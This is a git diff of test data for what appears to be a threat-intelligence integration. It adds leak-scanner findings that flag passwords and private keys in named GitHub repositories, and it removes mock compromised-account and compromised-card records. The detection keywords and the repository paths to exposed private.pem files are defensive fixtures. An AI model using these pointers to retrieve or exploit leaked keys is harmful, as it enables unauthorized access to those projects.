"evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "8ab2b9622faff09a1621dafbb147ecf8ba501604", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/ParameterManager/ParameterManager_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/ParameterManager/ParameterManager_prm.h" + }, + { + "dataFound": [], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:40+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "704ce46ed4918d3dfb434fb7411dd9c30741c1f6", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "Source/ServicesConfig/StateExecutionEngine/StateExecutionEngine_prm.h", + "revisions": [ + { + "bind": [ + { + "bindBy": "cyberintegration", + "companyId": 4189, + "data": "cyberintegration", + "ruleId": 455992, + "type": "keyword" + } + ], + "data": null, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": { + "cyberintegration": "cyberintegration" + }, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/ServicesConfig/StateExecutionEngine/StateExecutionEngine_prm.h" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-07-29T19:19:29+03:00", + "dateDetected": "2024-10-05T19:34:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "bbbd5900be4a011205fe2ec46f297edffce2a698", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "Source/Services/ParameterManager/ParameterManager.c", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "355d45fa1632312c96d3cbf57d837102e490992c", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1690647569 + } + } + ], + "rules": null, + "url": "https://github.com/example/DALILightEngine/tree/master/Source/Services/ParameterManager/ParameterManager.c" + } + ], + "id": "e129487e8490976801d5ba2623078387b2cfacb3", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/example/DALILightEngine", + "numberOf": { + "contributors": 1, + "files": 93 + }, + "relations": { + "cyberintegration": "cyberintegration" + }, + "seqUpdate": 1728156880303511, + "source": "github" + }, + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "begin private key": 2, + "password": 6 + }, + "dateCreated": "2023-03-31T20:52:25+03:00", + "dateDetected": "2024-10-12T14:58:23+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-03-31T22:27:43+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "41dba7b42f66eb72e3a2258cfeb068e7e9b6428c", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "e5ed9c96940166a0f1a0f2d8c538bb0587e02bd7", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686423433 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2023-06-04T11:32:06+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "8921da431bbc562961a131ab5958c1324caa906d", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "DATABASE/data/pl/5.txt", + "revisions": [ + { + "bind": [ + { + "bindBy": "pytia", + "companyId": 4189, + "data": "pytia", + "ruleId": 455991, + "type": "keyword" + } + ], + "data": null, + "hash": "6e75ac76542184f03b48d6ce9208913529a8d1e1", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1685867526 + } + } + ], + "rules": { + "pytia": "pytia" + }, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/DATABASE/data/pl/5.txt" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "9e2cd18c6ec790fd72d13b68ed3880a8480845cc", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "AUTHORIZATION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "1073384abb81cdbb0ea5a3be3ef1dba7bc4444b4", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684792840 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-05-21T15:09:55+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "7f03a2f14de1e70769b1f86e15cd7425514ccb66", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "SESSION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f82dec2051836821828ae7b84b99aa84aa4885c4", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684670995 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "7d51b93711e35b3ac97f4d483f87d4c8bbedb292", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "33cbe7fb2d127e8efd7dd98d808db8c223d89ec8", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684863717 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-24T18:03:58+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "c1b015cb6cdff6b28071e77e09e43bd87dbecd4f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "56101d6fa71af13ea5eef67f7cf0b088d6334e9d", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1685026090 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-23T01:00:40+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "3352e1c8441c1eb0d2a6b9968575d4aab71e566e", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f4e19cdb63d2aa490e1c754d5d7bf4a640fa7599", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1684940638 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/AUTHORIZATION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-06-10T21:39:20+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "362cc87c04580fefb42e28c780b07b1d78ca9430", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "FE/public-html/app.js", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "d5f9b30c3816d0af4f9f63b4260be814a9b27a68", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686439393 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/FE/public-html/app.js" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-22T00:36:55+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "b213f7127b8fbfe76e0cc076b4381618b9e6ef61", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "147e80f0c70f6cd4d923bfc09e3de7ea37f93601", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1686179309 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-05-05T18:55:57+03:00", + "dateDetected": "2024-10-12T11:58:37+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "54a3d4900f0af60ee79d5939c4dfc2ff17b333a1", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/test/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "163839df539930714366aac403a8fc32f592c3ff", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1683302157 + } + } + ], + "rules": null, + "url": "https://github.com/bartlomiejkrawczyk/PAINT-23L/tree/master/SESSION/src/test/resources/application.properties" + } + ], + "id": "b7f7c981d54f93a58af9a9d6024f4907f1c49c6c", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/bartlomiejkrawczyk/PAINT-23L", + "numberOf": { + "contributors": 9, + "files": 10 + }, + "relations": { + "pytia": "pytia" + }, + "seqUpdate": 1728734317546081, + "source": "github" + }, + { + "contributors": [ + { + "authorEmail": "example@gmail.com", + "authorName": "example" + }, + { + "authorEmail": "example@gmail.com", + "authorName": "example" + } + ], + "dataFound": { + "begin private key": 2, + "password": 6 + }, + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T14:58:22+03:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 50, + "reliability": 50, + "severity": "green", + "tlp": "amber", + "ttl": 30 + }, + "files": [ + { + "dataFound": [], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "9925f833b3b4ae766ebcd0d3e6d65f56f3a728f7", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "4e8bd797c4986e94a5d6a8ed296391b6c6d0e5cc", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1712751362 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/blob/master/README.md" + }, + { + "dataFound": [], + "dateCreated": "2024-04-10T15:16:02+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "gray", + "tlp": "amber", + "ttl": 30 + }, + "id": "a1e944fbfd7ea5b6cc4445b36b7c20fcf04dbc21", + "matchesType": [ + "readme" + ], + "matchesTypeCount": { + "readme": 1 + }, + "name": "README_PL.md", + "revisions": [ + { + "bind": [ + { + "bindBy": "", + "companyId": 0, + "data": "", + "ruleId": 0, + "type": "readme" + } + ], + "data": null, + "hash": "7bb835f3c70c795af6b0905acac54df259363db9", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1712751372 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/blob/master/README_PL.md" + }, + { + "dataFound": [], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "red", + "tlp": "amber", + "ttl": 30 + }, + "id": "fdf8fc37755c78a240b77641a97b61bd94b645e2", + "matchesType": [ + "keyword" + ], + "matchesTypeCount": { + "keyword": 1 + }, + "name": "DATABASE/data/pl/5.txt", + "revisions": [ + { + "bind": [ + { + "bindBy": "pytia", + "companyId": 4189, + "data": "pytia", + "ruleId": 455991, + "type": "keyword" + } + ], + "data": null, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": { + "pytia": "pytia" + }, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/DATABASE/data/pl/5.txt" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "026768532bcf4dd2d210a5a737ecd360836b94c2", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "AUTHORIZATION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "begin private key" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "b912425818c603960dd60f29a9bcc84f5715b090", + "matchesType": [ + "ssh" + ], + "matchesTypeCount": { + "ssh": 1 + }, + "name": "SESSION/src/main/resources/private.pem", + "revisions": [ + { + "bind": [], + "data": { + "ssh": { + "ssh": [ + "begin private key" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/main/resources/private.pem" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "1d2eb46187084a1968523de96477b7fb7c6b8d86", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/model/RegisterRequest.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "748ba40c667039a0de88a0b38482265ad01c2a6f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/java/org/example/authorization/service/implementation/UserServiceImpl.java" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "796973b223778cd4d5c07b4787d2ec00704fd325", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "AUTHORIZATION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/AUTHORIZATION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "e90f2df5fdb22056e360ee8c19335d90047498fa", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "FE/public-html/app.js", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/FE/public-html/app.js" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "4256b013e8f6de1cd19a09cae9a90e7f0c92ccc9", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/main/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/main/resources/application.properties" + }, + { + "dataFound": [ + "password" + ], + "dateCreated": "2023-08-07T10:36:01+03:00", + "dateDetected": "2024-10-12T11:58:39+00:00", + "evaluation": { + "admiraltyCode": "A1", + "credibility": 30, + "reliability": 100, + "severity": "orange", + "tlp": "amber", + "ttl": 30 + }, + "id": "a4fc7c10ad0a1ed8c44199ca8245e8aa080cc97f", + "matchesType": [ + "commonKeywords" + ], + "matchesTypeCount": { + "commonKeywords": 1 + }, + "name": "SESSION/src/test/resources/application.properties", + "revisions": [ + { + "bind": [], + "data": { + "commonKeywords": { + "password": [ + "password" + ] + } + }, + "hash": "f683e43cb4802d690b6ce4391c6819c79adb6f13", + "info": { + "authorEmail": "example@gmail.com", + "authorName": "example", + "timestamp": 1691393761 + } + } + ], + "rules": null, + "url": "https://github.com/CrustyCracker/Wordle/tree/master/SESSION/src/test/resources/application.properties" + } + ], + "id": "982e16c0481ef7b95ca105769c783336c99cdc6c", + "isFavourite": false, + "isHidden": false, + "isIgnore": false, + "matchesTypes": [], + "name": "https://github.com/CrustyCracker/Wordle", + "numberOf": { + "contributors": 2, + "files": 11 + }, + "relations": { + "pytia": "pytia" + }, + "seqUpdate": 1728734319944338, + "source": "github" + } + ], + "seqUpdate": 1728734319944338 + } +} \ No newline at end of file diff --git a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/results.json b/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/results.json deleted file mode 100644 index 78fcc57c2c0a..000000000000 --- a/Packs/GroupIB_ThreatIntelligenceAttribution/Integrations/GroupIBTIA/test_data/results.json +++ /dev/null @@ -1,91 +0,0 @@ -{ - "compromised/account_group": [ - { - "last_fetch": { - "compromised/account": 1614919893874 - } - }, - [ - { - "name": "Compromised Account: some@gmail.com", - "occurred": "2022-10-20T18:12:28Z", - "rawJSON": "{\"dateFirstCompromised\": null, \"dateFirstSeen\": '\n '\"2022-10-20T18:12:28+00:00\", \"dateLastCompromised\": null, '\n '\"dateLastSeen\": \"2022-10-20T18:12:28+00:00\", \"displayOptions\": '\n '{\"favouriteForCompanies\": [], \"hideForCompanies\": [], '\n '\"isFavourite\": false, \"isHidden\": false}, \"evaluation\": '\n '{\"admiraltyCode\": \"A2\", \"credibility\": 80, \"reliability\": 100, '\n '\"severity\": \"red\", \"tlp\": \"red\", \"ttl\": 30}, \"eventCount\": 1, '\n '\"events\": [{\"client\": {\"ipv4\": {\"asn\": \"ASN\", \"city\": \"City\", '\n '\"countryCode\": \"Code\", \"countryName\": \"Country Name\", \"ip\": '\n '\"11.11.11.11\", \"provider\": \"provider\", \"region\": \"region\"}, '\n '\"ipv6\": null}, \"cnc\": {\"cnc\": \"https://some.ru\", \"domain\": '\n '\"some.ru\", \"ipv4\": {\"asn\": \"ASN\", \"city\": \"City\", '\n '\"countryCode\": \"Code\", \"countryName\": \"Country Name\", \"ip\": '\n '\"11.11.11.11\", \"provider\": \"provider\", \"region\": \"region\"}, '\n '\"ipv6\": null, \"url\": \"https://some.ru\"}, \"dateCompromised\": '\n 'null, \"dateDetected\": \"2022-10-20T18:12:28+00:00\", \"id\": '\n '\"1111111111111111111111111111111111111111\", \"malware\": '\n '{\"category\": [], \"class\": null, \"id\": '\n '\"1111111111111111111111111111111111111111\", \"name\": \"AZORult\", '\n '\"platform\": [], \"stixGuid\": '\n '\"1111111111111111111111111111111111111111\", \"threatLevel\": '\n 'null}, \"oldId\": \"11111111\", \"person\": null, \"source\": {\"id\": '\n '\"\", \"idType\": \"\", \"type\": \"Botnet\"}, \"stixGuid\": '\n '\"1111111111111111111111111111111111111111\", \"threatActor\": '\n 'null}], \"id\": \"1111111111111111111111111111111111111111\", '\n '\"login\": \"some@gmail.com\", \"malware\": [{\"category\": [], '\n '\"class\": null, \"id\": '\n '\"1111111111111111111111111111111111111111\", \"name\": \"Name\", '\n '\"platform\": [], \"stixGuid\": null, \"threatLevel\": null}], '\n '\"parsedLogin\": {\"domain\": \"some.com\", \"ip\": null}, \"password\": '\n '\"?\", \"port\": null, \"portalLink\": null, \"seqUpdate\": '\n '1670823245323, \"service\": {\"domain\": \"some.com\", \"host\": '\n '\"some.com\", \"ip\": null, \"url\": \"https://some.ru\"}, \"source\": '\n '[{\"id\": \"\", \"idType\": \"\", \"type\": \"Botnet\"}], \"sourceId\": [], '\n '\"sourceType\": [\"Botnet\"], \"threatActor\": [], \"name\": '\n '\"Compromised Account: some@gmail.com\", \"gibType\": '\n '\"compromised/account_group\", \"relatedIndicatorsData\": '\n '[[\"https://some.ru\"], [\"some.ru\"], [\"11.11.11.11\"], '\n '[\"11.11.11.11\"]], \"systemSeverity\": 3}'}])" - } - ] - ], - "compromised/card": [ - { - "last_fetch": { - "compromised/card": 1614923910464 - } - }, - [ - { - "name": "Compromised Card: 545123XXXXXXXXXX", - "occurred": "2019-12-12T10:57:49Z", - "rawJSON": "{\"baseName\": \"United States\", \"cardInfo\": {\"cvv\": null, \"dump\": null, \"issuer\": {\"countryCode\": \"US\", \"countryName\": \"UNITED STATES\", \"issuer\": \"SOME BANK\"}, \"number\": \"545123XXXXXXXXXX\", \"system\": \"VISA\", \"type\": \"CLASSIC\", \"validThru\": \"09/2025\"}, \"client\": {\"ipv4\": {\"asn\": null, \"city\": null, \"countryCode\": null, \"countryName\": null, \"ip\": null, \"provider\": null, \"region\": null}}, \"cnc\": {\"cnc\": \"mandarincc.pw\", \"domain\": \"mandarincc.pw\", \"ipv4\": {\"asn\": null, \"city\": \"San Francisco\", \"countryCode\": \"US\", \"countryName\": \"United States\", \"ip\": \"11.11.11.11\", \"provider\": \"Cloudflare\", \"region\": \"California\"}, \"ipv6\": null, \"url\": null}, \"dateCompromised\": \"2019-12-12T10:41:00+00:00\", \"dateDetected\": \"2019-12-12T10:57:49+00:00\", \"evaluation\": {\"admiraltyCode\": \"A2\", \"credibility\": 80, \"reliability\": 90, \"severity\": \"red\", \"tlp\": \"red\", \"ttl\": 90}, \"externalId\": \"12312\", \"id\": \"ecda6f4dc85596f447314ce01e2152db9c9d3cbc\", \"isFavourite\": false, \"isHidden\": false, \"malware\": {\"id\": \"53013c863116aae720581ff2aa2b4f92d3cb2bd7\", \"name\": \"mandarincc\"}, \"oldId\": \"396798216\", \"owner\": {\"address\": null, \"birthday\": null, \"city\": \"Something\", \"countryCode\": \"US\", \"email\": null, \"name\": \"Gary Oldman\", \"passport\": null, \"phone\": \"932876\", \"state\": \"Ohio\", \"taxNumber\": null, \"zip\": null}, \"portalLink\": \"https://bt.group-ib.com/cd/cards?searchValue=id:ecda6f4dc85596f447314ce01e2152db9c9d3cbc\", \"price\": {\"currency\": \"USD\", \"value\": \"13213\"}, \"seqUpdate\": 1614923910464, \"serviceCode\": null, \"sourceType\": \"Card shop\", \"threatActor\": {\"country\": null, \"id\": \"d7ff75c35f93dce6f5410bba9a6c206bdff66555\", \"isAPT\": false, \"name\": \"FRK48\"}, \"track\": [], \"name\": \"Compromised Card: 545123XXXXXXXXXX\", \"gibType\": \"compromised/card\", \"relatedIndicatorsData\": [\"mandarincc.pw\", \"11.11.11.11\"], \"systemSeverity\": 3}" - } - ] - ], - "bp/phishing": [ - 